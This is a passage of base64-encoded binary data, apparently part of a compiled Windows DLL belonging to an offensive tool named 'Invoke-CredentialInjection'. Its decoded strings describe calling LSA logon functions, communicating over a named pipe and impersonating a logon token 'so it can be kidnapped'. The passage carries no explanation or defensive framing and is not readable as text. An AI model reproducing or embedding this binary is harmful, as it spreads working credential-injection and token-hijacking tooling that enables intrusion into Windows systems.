AtAEwAVgAAAGwAdAAtAEwAVAAAAGYAYQAtAEkAUgAAAHYAaQAtAFYATgAAAGgAeQAtAEEATQAAAGEAegAtAEEAWgAtAEwAYQB0AG4AAAAAAGUAdQAtAEUAUwAAAG0AawAtAE0ASwAAAHQAbgAtAFoAQQAAAHgAaAAtAFoAQQAAAHoAdQAtAFoAQQAAAGEAZgAtAFoAQQAAAGsAYQAtAEcARQAAAGYAbwAtAEYATwAAAGgAaQAtAEkATgAAAG0AdAAtAE0AVAAAAHMAZQAtAE4ATwAAAG0AcwAtAE0AWQAAAGsAawAtAEsAWgAAAGsAeQAtAEsARwAAAHMAdwAtAEsARQAAAHUAegAtAFUAWgAtAEwAYQB0AG4AAAAAAHQAdAAtAFIAVQAAAGIAbgAtAEkATgAAAHAAYQAtAEkATgAAAGcAdQAtAEkATgAAAHQAYQAtAEkATgAAAHQAZQAtAEkATgAAAGsAbgAtAEkATgAAAG0AbAAtAEkATgAAAG0AcgAtAEkATgAAAHMAYQAtAEkATgAAAG0AbgAtAE0ATgAAAGMAeQAtAEcAQgAAAGcAbAAtAEUAUwAAAGsAbwBrAC0ASQBOAAAAAABzAHkAcgAtAFMAWQAAAAAAZABpAHYALQBNAFYAAAAAAHEAdQB6AC0AQgBPAAAAAABuAHMALQBaAEEAAABtAGkALQBOAFoAAABhAHIALQBJAFEAAABkAGUALQBDAEgAAABlAG4ALQBHAEIAAABlAHMALQBNAFgAAABmAHIALQBCAEUAAABpAHQALQBDAEgAAABuAGwALQBCAEUAAABuAG4ALQBOAE8AAABwAHQALQBQAFQAAABzAHIALQBTAFAALQBMAGEAdABuAAAAAABzAHYALQBGAEkAAABhAHoALQBBAFoALQBDAHkAcgBsAAAAAABzAGUALQBTAEUAAABtAHMALQBCAE4AAAB1AHoALQBVAFoALQBDAHkAcgBsAAAAAABxAHUAegAtAEUAQwAAAAAAYQByAC0ARQBHAAAAegBoAC0ASABLAAAAZABlAC0AQQBUAAAAZQBuAC0AQQBVAAAAZQBzAC0ARQBTAAAAZgByAC0AQwBBAAAAcwByAC0AUwBQAC0AQwB5AHIAbAAAAAAAcwBlAC0ARgBJAAAAcQB1AHoALQBQAEUAAAAAAGEAcgAtAEwAWQAAAHoAaAAtAFMARwAAAGQAZQAtAEwAVQAAAGUAbgAtAEMAQQAAAGUAcwAtAEcAVAAAAGYAcgAtAEMASAAAAGgAcgAtAEIAQQAAAHMAbQBqAC0ATgBPAAAAAABhAHIALQBEAFoAAAB6AGgALQBNAE8AAABkAGUALQBMAEkAAABlAG4ALQBOAFoAAABlAHMALQBDAFIAAABmAHIALQBMAFUAAABiAHMALQBCAEEALQBMAGEAdABuAAAAAABzAG0AagAtAFMARQAAAAAAYQByAC0ATQBBAAAAZQBuAC0ASQBFAAAAZQBzAC0AUABBAAAAZgByAC0ATQBDAAAAcwByAC0AQgBBAC0ATABhAHQAbgAAAAAAcwBtAGEALQBOAE8AAAAAAGEAcgAtAFQATgAAAGUAbgAtAFoAQQAAAGUAcwAtAEQATwAAAHMAcgAtAEIAQQAtAEMAeQByAGwAAAAAAHMAbQBhAC0AUwBFAAAAAABhAHIALQBPAE0AAABlAG4ALQBKAE0AAABlAHMALQBWAEUAAABzAG0AcwAtAEYASQAAAAAAYQByAC0AWQBFAAAAZQBuAC0AQwBCAAAAZQBzAC0AQwBPAAAAcwBtAG4ALQBGAEkAAAAAAGEAcgAtAFMAWQAAAGUAbgAtAEIAWgAAAGUAcwAtAFAARQAAAGEAcgAtAEoATwAAAGUAbgAtAFQAVAAAAGUAcwAtAEEAUgAAAGEAcgAtAEwAQgAAAGUAbgAtAFoAVwAAAGUAcwAtAEUAQwAAAGEAcgAtAEsAVwAAAGUAbgAtAFAASAAAAGUAcwAtAEMATAAAAGEAcgAtAEEARQAAAGUAcwAtAFUAWQAAAGEAcgAtAEIASAAAAGUAcwAtAFAAWQAAAGEAcgAtAFEAQQAAAGUAcwAtAEIATwAAAGUAcwAtAFMAVgAAAGUAcwAtAEgATgAAAGUAcwAtAE4ASQAAAGUAcwAtAFAAUgAAAHoAaAAtAEMASABUAAAAAABzAHIAAAAAAGEAZgAtAHoAYQAAAGEAcgAtAGEAZQAAAGEAcgAtAGIAaAAAAGEAcgAtAGQAegAAAGEAcgAtAGUAZwAAAGEAcgAtAGkAcQAAAGEAcgAtAGoAbwAAAGEAcgAtAGsAdwAAAGEAcgAtAGwAYgAAAGEAcgAtAGwAeQAAAGEAcgAtAG0AYQAAAGEAcgAtAG8AbQAAAGEAcgAtAHEAYQAAAGEAcgAtAHMAYQAAAGEAcgAtAHMAeQAAAGEAcgAtAHQAbgAAAGEAcgAtAHkAZQAAAGEAegAtAGEAegAtAGMAeQByAGwAAAAAAGEAegAtAGEAegAtAGwAYQB0AG4AAAAAAGIAZQAtAGIAeQAAAGIAZwAtAGIAZwAAAGIAbgAtAGkAbgAAAGIAcwAtAGIAYQAtAGwAYQB0AG4AAAAAAGMAYQAtAGUAcwAAAGMAcwAtAGMAegAAAGMAeQAtAGcAYgAAAGQAYQAtAGQAawAAAGQAZQAtAGEAdAAAAGQAZQAtAGMAaAAAAGQAZQAtAGQAZQAAAGQAZQAtAGwAaQAAAGQAZQAtAGwAdQAAAGQAaQB2AC0AbQB2AAAAAABlAGwALQBnAHIAAABlAG4ALQBhAHUAAABlAG4ALQBiAHoAAABlAG4ALQBjAGEAAABlAG4ALQBjAGIAAABlAG4ALQBnAGIAAABlAG4ALQBpAGUAAABlAG4ALQBqAG0AAABlAG4ALQBuAHoAAABlAG4ALQBwAGgAAABlAG4ALQB0AHQAAABlAG4ALQB1AHMAAABlAG4ALQB6AGEAAABlAG4ALQB6AHcAAABlAHMALQBhAHIAAABlAHMALQBiAG8AAABlAHMALQBjAGwAAABlAHMALQBjAG8AAABlAHMALQBjAHIAAABlAHMALQBkAG8AAABlAHMALQBlAGMAAABlAHMALQBlAHMAAABlAHMALQBnAHQAAABlAHMALQBoAG4AAABlAHMALQBtAHgAAABlAHMALQBuAGkAAABlAHMALQBwAGEAAABlAHMALQBwAGUAAABlAHMALQBwAHIAAABlAHMALQBwAHkAAABlAHMALQBzAHYAAABlAHMALQB1AHkAAABlAHMALQB2AGUAAABlAHQALQBlAGUAAABlAHUALQBlAHMAAABmAGEALQBpAHIAAABmAGkALQBmAGkAAABmAG8ALQBmAG8AAABmAHIALQBiAGUAAABmAHIALQBjAGEAAABmAHIALQBjAGgAAABmAHIALQBmAHIAAABmAHIALQBsAHUAAABmAHIALQBtAGMAAABnAGwALQBlAHMAAABnAHUALQBpAG4AAABoAGUALQBpAGwAAABoAGkALQBpAG4AAABoAHIALQBiAGEAAABoAHIALQBoAHIAAABoAHUALQBoAHUAAABoAHkALQBhAG0AAABpAGQALQBpAGQAAABpAHMALQBpAHMAAABpAHQALQBjAGgAAABpAHQALQBpAHQAAABqAGEALQBqAHAAAABrAGEALQBnAGUAAABrAGsALQBrAHoAAABrAG4ALQBpAG4AAABrAG8AawAtAGkAbgAAAAAAawBvAC0AawByAAAAawB5AC0AawBnAAAAbAB0AC0AbAB0AAAAbAB2AC0AbAB2AAAAbQBpAC0AbgB6AAAAbQBrAC0AbQBrAAAAbQBsAC0AaQBuAAAAbQBuAC0AbQBuAAAAbQByAC0AaQBuAAAAbQBzAC0AYgBuAAAAbQBzAC0AbQB5AAAAbQB0AC0AbQB0AAAAbgBiAC0AbgBvAAAAbgBsAC0AYgBlAAAAbgBsAC0AbgBsAAAAbgBuAC0AbgBvAAAAbgBzAC0AegBhAAAAcABhAC0AaQBuAAAAcABsAC0AcABsAAAAcAB0AC0AYgByAAAAcAB0AC0AcAB0AAAAcQB1AHoALQBiAG8AAAAAAHEAdQB6AC0AZQBjAAAAAABxAHUAegAtAHAAZQAAAAAAcgBvAC0AcgBvAAAAcgB1AC0AcgB1AAAAcwBhAC0AaQBuAAAAcwBlAC0AZgBpAAAAcwBlAC0AbgBvAAAAcwBlAC0AcwBlAAAAcwBrAC0AcwBrAAAAcwBsAC0AcwBpAAAAcwBtAGEALQBuAG8AAAAAAHMAbQBhAC0AcwBlAAAAAABzAG0AagAtAG4AbwAAAAAAcwBtAGoALQBzAGUAAAAAAHMAbQBuAC0AZgBpAAAAAABzAG0AcwAtAGYAaQAAAAAAcwBxAC0AYQBsAAAAcwByAC0AYgBhAC0AYwB5AHIAbAAAAAAAcwByAC0AYgBhAC0AbABhAHQAbgAAAAAAcwByAC0AcwBwAC0AYwB5AHIAbAAAAAAAcwByAC0AcwBwAC0AbABhAHQAbgAAAAAAcwB2AC0AZgBpAAAAcwB2AC0AcwBlAAAAcwB3AC0AawBlAAAAcwB5AHIALQBzAHkAAAAAAHQAYQAtAGkAbgAAAHQAZQAtAGkAbgAAAHQAaAAtAHQAaAAAAHQAbgAtAHoAYQAAAHQAcgAtAHQAcgAAAHQAdAAtAHIAdQAAAHUAawAtAHUAYQAAAHUAcgAtAHAAawAAAHUAegAtAHUAegAtAGMAeQByAGwAAAAAAHUAegAtAHUAegAtAGwAYQB0AG4AAAAAAHYAaQAtAHYAbgAAAHgAaAAtAHoAYQAAAHoAaAAtAGMAaABzAAAAAAB6AGgALQBjAGgAdAAAAAAAegBoAC0AYwBuAAAAegBoAC0AaABrAAAAegBoAC0AbQBvAAAAegBoAC0AcwBnAAAAegBoAC0AdAB3AAAAegB1AC0AegBhAAAAAAAAAAAAAAAAAADA//81wmghotoPyf8/AAAAAAAA8D8IBAgICAQICAAEDAgABAwIAAAAAAAAAAAAAPA/fwI1wmghotoPyT5A////////738AAAAAAAAQAAAAAAAAAJjAAAAAAAAAmEAAAAAAAADwfwAAAAAAAAAAAAAAAFRCARBgQgEQaEIBEHRCARCAQgEQjEIBEJhCARCoQgEQtEIBELxCARDEQgEQ0EIBENxCARCXVwEQ6EIBEPBCARD4QgEQ/EIBEABDARAEQwEQCEMBEAxDARAQQwEQFEMBECBDARAkQwEQKEMBECxDARAwQwEQNEMBEDhDARA8QwEQQEMBEERDARBIQwEQTEMBEFBDARBUQwEQWEMBEFxDARBgQwEQZEMBEGhDARBsQwEQcEMBEHRDARB4QwEQfEMBEIBDARCEQwEQiEMBEIxDARCQQwEQlEMBEJhDARCcQwEQqEMBELRDARC8QwEQyEMBEOBDARDsQwEQAEQBECBEARBARAEQYEQBEIBEARCgRAEQxEQBEOBEARAERQEQJEUBEExFARBoRQEQeEUBEHxFARCERQEQlEUBELhFARDARQEQzEUBENxFARD4RQEQGEYBEEBGARBoRgEQkEYBELxGARDYRgEQ/EYBECBHARBMRwEQeEcBEJdXARCURwEQqEcBEMRHARDYRwEQ+EcBEF9fYmFzZWQoAAAAAF9fY2RlY2wAX19wYXNjYWwAAAAAX19zdGRjYWxsAAAAX190aGlzY2FsbAAAX19mYXN0Y2FsbAAAX192ZWN0b3JjYWxsAAAAAF9fY2xyY2FsbAAAAF9fZWFiaQAAX19wdHI2NABfX3Jlc3RyaWN0AABfX3VuYWxpZ25lZAByZXN0cmljdCgAAAAgbmV3AAAAACBkZWxldGUAPQAAAD4+AAA8PAAAIQAAAD09AAAhPQAAW10AAG9wZXJhdG9yAAAAAC0+AAAqAAAAKysAAC0tAAAtAAAAKwAAACYAAAAtPioALwAAACUAAAA8AAAAPD0AAD4AAAA+PQAALAAAACgpAAB+AAAAXgAAAHwAAAAmJgAAfHwAACo9AAArPQAALT0AAC89AAAlPQAAPj49ADw8PQAmPQAAfD0AAF49AABgdmZ0YWJsZScAAABgdmJ0YWJsZScAAABgdmNhbGwnAGB0eXBlb2YnAAAAAGBsb2NhbCBzdGF0aWMgZ3VhcmQnAAAAAGBzdHJpbmcnAAAAAGB2YmFzZSBkZXN0cnVjdG9yJwAAYHZlY3RvciBkZWxldGluZyBkZXN0cnVjdG9yJwAAAABgZGVmYXVsdCBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAAGBzY2FsYXIgZGVsZXRpbmcgZGVzdHJ1Y3RvcicAAAAAYHZlY3RvciBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAGB2aXJ0dWFsIGRpc3BsYWNlbWVudCBtYXAnAABgZWggdmVjdG9yIGNvbnN0cnVjdG9yIGl0ZXJhdG9yJwAAAABgZWggdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAGBlaCB2ZWN0b3IgdmJhc2UgY29uc3RydWN0b3IgaXRlcmF0b3InAABgY29weSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAAYHVkdCByZXR1cm5pbmcnAGBFSABgUlRUSQAAAGBsb2NhbCB2ZnRhYmxlJwBgbG9jYWwgdmZ0YWJsZSBjb25zdHJ1Y3RvciBjbG9zdXJlJwAgbmV3W10AACBkZWxldGVbXQAAAGBvbW5pIGNhbGxzaWcnAABgcGxhY2VtZW50IGRlbGV0ZSBjbG9zdXJlJwAAYHBsYWNlbWVudCBkZWxldGVbXSBjbG9zdXJlJwAAAABgbWFuYWdlZCB2ZWN0b3IgY29uc3RydWN0b3IgaXRlcmF0b3InAAAAYG1hbmFnZWQgdmVjdG9yIGRlc3RydWN0b3IgaXRlcmF0b3InAAAAAGBlaCB2ZWN0b3IgY29weSBjb25zdHJ1Y3RvciBpdGVyYXRvcicAAABgZWggdmVjdG9yIHZiYXNlIGNvcHkgY29uc3RydWN0b3IgaXRlcmF0b3InAGBkeW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CBAIEAgQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAEAAQABAAEAAQABAAggCCAIIAggCCAIIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACABAAEAAQABAAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQAhACEAIQAhACEABAAEAAQABAAEAAQABAAgQGBAYEBgQGBAYEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBARAAEAAQABAAEAAQAIIBggGCAYIBggGCAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgEQABAAEAAQACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAAgAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBEAABAQEBAQEBAQEBAQEBAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECAQIBAgECARAAAgECAQIBAgECAQIBAgECAQEBAAAAAICBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5eltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/4CBgoOEhYaHiImKi4yNjo+QkZKTlJWWl5iZmpucnZ6foKGio6SlpqeoqaqrrK2ur7CxsrO0tba3uLm6u7y9vr/AwcLDxMXGx8jJysvMzc7P0NHS09TV1tfY2drb3N3e3+Dh4uPk5ebn6Onq6+zt7u/w8fLz9PX29/j5+vv8/f7/AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlae3x9fn+AgYKDhIWGh4iJiouMjY6PkJGSk5SVlpeYmZqbnJ2en6ChoqOkpaanqKmqq6ytrq+wsbKztLW2t7i5uru8vb6/wMHCw8TFxsfIycrLzM3Oz9DR0tPU1dbX2Nna29zd3t/g4eLj5OXm5+jp6uvs7e7v8PHy8/T19vf4+fr7/P3+/wECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8gISIjJCUmJygpKissLS4vMDEyMzQ1Njc4OTo7PD0+P0BBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWltcXV5fYGFiY2RlZmdoaWprbG1ub3BxcnN0dXZ3eHl6e3x9fn8AMSNTTkFOAAAxI0lORAAAADEjSU5GAAAAMSNRTkFOAABDAE8ATgBPAFUAVAAkAAAAQQAAABcAAABnZW5lcmljAHVua25vd24gZXJyb3IAAABpb3N0cmVhbQAAAABpb3N0cmVhbSBzdHJlYW0gZXJyb3IAAABzeXN0ZW0AAHN0cmluZyB0b28gbG9uZwBpbnZhbGlkIHN0cmluZyBwb3NpdGlvbgBcAFwALgBcAHAAaQBwAGUAXABzAHEAcwB2AGMAAAAAAEVycm9yIGNhbGxpbmcgTHNhQ29ubmVjdFVudHJ1c3RlZC4gRXJyb3IgY29kZTogAGhMU0EgKExTQSBoYW5kbGUpIGlzIE5VTEwsIHRoaXMgc2hvdWxkbid0IGV2ZXIgaGFwcGVuLgAATUlDUk9TT0ZUX0FVVEhFTlRJQ0FUSU9OX1BBQ0tBR0VfVjFfMAAAAEtlcmJlcm9zAAAAAFJlY2VpdmVkIGFuIGludmFsaWQgYXV0aCBwYWNrYWdlIGZyb20gdGhlIG5hbWVkIHBpcGUAAAAAQ2FsbCB0byBMc2FMb29rdXBBdXRoZW50aWNhdGlvblBhY2thZ2UgZmFpbGVkLiBFcnJvciBjb2RlOiAAQ2FsbCB0byBPcGVuUHJvY2Vzc1Rva2VuIGZhaWxlZC4gRXJyb3Jjb2RlOiAAAAAAQ2FsbCB0byBHZXRUb2tlbkluZm9ybWF0aW9uIGZhaWxlZC4ARXJyb3IgY2FsbGluZyBMc2FMb2dvblVzZXIuIEVycm9yIGNvZGU6IAAAAAAAAAAATG9nb24gc3VjY2VlZGVkLCBpbXBlcnNvbmF0aW5nIHRoZSB0b2tlbiBzbyBpdCBjYW4gYmUga2lkbmFwcGVkIGFuZCBzdGFydGluZyBhbiBpbmZpbml0ZSBsb29wIHdpdGggdGhlIHRocmVhZC4AACVsdQAlZAAAJWxkAAAAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIcAEQwFsBEAcAAABSU0RTagGqOaRFrEeLCo/WO9YMbwEAAABDOlxHaXRIdWJcUG93ZXJTaGVsbFxJbnZva2UtQ3JlZGVudGlhbEluamVjdGlvblxMb2dvblVzZXJcTG9nb25Vc2VyXFJlbGVhc2VcbG9nb24ucGRiAAAAAAAAAKQAAACkAAAAAAAAAAAAAAAQggEQAAAAAAAAAAD/////AAAAAEAAAACIWAEQAAAAAAAAAAABAAAAmFgBEGxYARAAAAAAAAAAAAAAAAAAAAAA9IEBELRYARAAAAAAAAAAAAIAAADEWAEQ0FgBEGxYARAAAAAA9IEBEAEAAAAAAAAA/////wAAAABAAAAAtFgBEAAAAAAAAAAAAAAAACyCARAAWQEQAAAAAAAAAAACAAAAEFkBEBxZARBsWAEQAAAAACyCARABAAAAAAAAAP////8AAAAAQAAAAABZARAAAAAAAAAAAAAAAABMggEQTFkBEAAAAAAAAAAAAwAAAFxZARBsWQEQHFkBEGxYARAAAAAATIIBEAIAAAAAAAAA/////wAAAABAAAAATFkBEAAAAAAAAAAAAAAAAGyCARCcWQEQAAAAAAAAAAADAAAArFkBELxZARAcWQEQbFgBEAAAAABsggEQAgAAAAAAAAD/////AAAAAEAAAACcWQEQAAAAAAAAAAAAAAAAjIIBEOxZARAAAAAAAAAAAAEAAAD8WQEQBFoBEAAAAACMggEQAAAAAAAAAAD/////AAAAAEAAAADsWQEQAAAAAAAAAAAAAAAAEIIBEIhYARAAAAAAAAAAAAAAAACkggEQSFoBEAAAAAAAAAAAAgAAAFhaARBkWgEQbFgBEAAAAACkggEQAQAAAAAAAAD/////AAAAAEAAAABIWgEQAAAAAAAAAAABAAAAQFsBEByDARAAAAAAAAAAAP////8AAAAAQAAAAIBaARAAAAAAAAAAAAMAAAC8WgEQSFsBEOBaARCQWgEQAAAAAAAAAAAAAAAAAAAAAECDARCUWwEQQIMBEAEAAAAAAAAA/////wAAAABAAAAAlFsBEMSCARACAAAAAAAAAP////8AAAAAQAAAAGRbARAAAAAAAAAAAAAAAAAcgwEQgFoBEAAAAAAAAAAAAAAAAMSCARBkWwEQkFoBEAAAAADwggEQAgAAAAAAAAD/////AAAAAEAAAACsWgEQAAAAAAAAAAADAAAApFsBEAAAAAAAAAAAAAAAAPCCARCsWgEQ4FoBEJBaARAAAAAAAAAAAAAAAAACAAAAiFsBEPxaARDgWgEQkFoBEAAAAAAAAAAAAAAAAAAAAABUNgAAhTYAAPBDAADAjgAA4LQAAAD5AAAb+QAAAAAAAAAAAAAAAAAAAAAAAAAAAAAiBZMZBAAAABRcARACAAAANFwBEAAAAAAAAAAAAAAAAAEAAAD/////AAAAAP////8AAAAAAQAAAAAAAAABAAAAAAAAAAIAAAACAAAAAwAAAAEAAABcXAEQAAAAAAAAAAADAAAAAQAAAGxcARBAAAAAAAAAAAAAAACyFwAQQAAAAAAAAAAAAAAAdRcAEAAAAAC2IgAQAAAAAIxcARACAAAAmFwBELRcARAQAAAA9IEBEAAAAAD/////AAAAAAwAAABKIgAQAAAAABCCARAAAAAA/////wAAAAAMAAAA9zoAEAAAAAAsggEQAAAAAP////8AAAAADAAAAIAiABAAAAAAwSIAEAAAAAD8XAEQAwAAAAxdARDQXAEQtFwBEAAAAABMggEQAAAAAP////8AAAAADAAAAGUiABAAAAAAwSIAEAAAAAA4XQEQAwAAAEhdARDQXAEQtFwBEAAAAABsggEQAAAAAP////8AAAAADAAAAJsiABAAAAAA/v///wAAAADU////AAAAAP7///8AAAAAXioAEAAAAAD+////AAAAANj///8AAAAA/v///wAAAADyLAAQAAAAAP7///8AAAAA1P///wAAAAD+////ii4AEKQuABAAAAAA/v///wAAAADE////AAAAAP7///8AAAAAa0IAEAAAAAD+////AAAAANj///8AAAAA/v///ytNABBHTQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAABRPABAAAAAA/v///wAAAADY////AAAAAP7///8AAAAArlcAEP7///8AAAAAulcAEP7///8AAAAA2P///wAAAAD+////AAAAAB5ZABD+////AAAAAC1ZABD+////AAAAAHz///8AAAAA/v///wAAAACRXAAQAAAAAP7///8AAAAA2P///wAAAAD+////xGUAEMhlABAAAAAA/v///wAAAADY////AAAAAP7///+QZQAQlGUAEAAAAAD+////AAAAAND///8AAAAA/v///wAAAABgcgAQAAAAACVyABAvcgAQ/v///wAAAACw////AAAAAP7///8AAAAAE2gAEAAAAABnZwAQcWcAEP7///8AAAAA2P///wAAAAD+////h28AEItvABAAAAAA/v///wAAAADY////AAAAAP7///9cZgAQZWYAEEAAAAAAAAAAAAAAAMBoABD/////AAAAAP////8AAAAAAAAAAAAAAAABAAAAAQAAAGRfARAiBZMZAgAAAHRfARABAAAAhF8BEAAAAAAAAAAAAAAAAAEAAAAAAAAA/v///wAAAADU////AAAAAP7///9CcQAQRnEAEAAAAACiZgAQAAAAAOxfARACAAAA+F8BELRcARAAAAAApIIBEAAAAAD/////AAAAAAwAAACHZgAQAAAAAP7///8AAAAA2P///wAAAAD+////AAAAAC6AABAAAAAA/v///wAAAADY////AAAAAP7///95gwAQjIMAEAAAAAD+////AAAAALz///8AAAAA/v///wAAAACChQAQAAAAAP7///8AAAAA1P///wAAAAD+////AAAAAF2JABAAAAAA/v///wAAAADQ////AAAAAP7///8AAAAA2IoAEAAAAAD+////AAA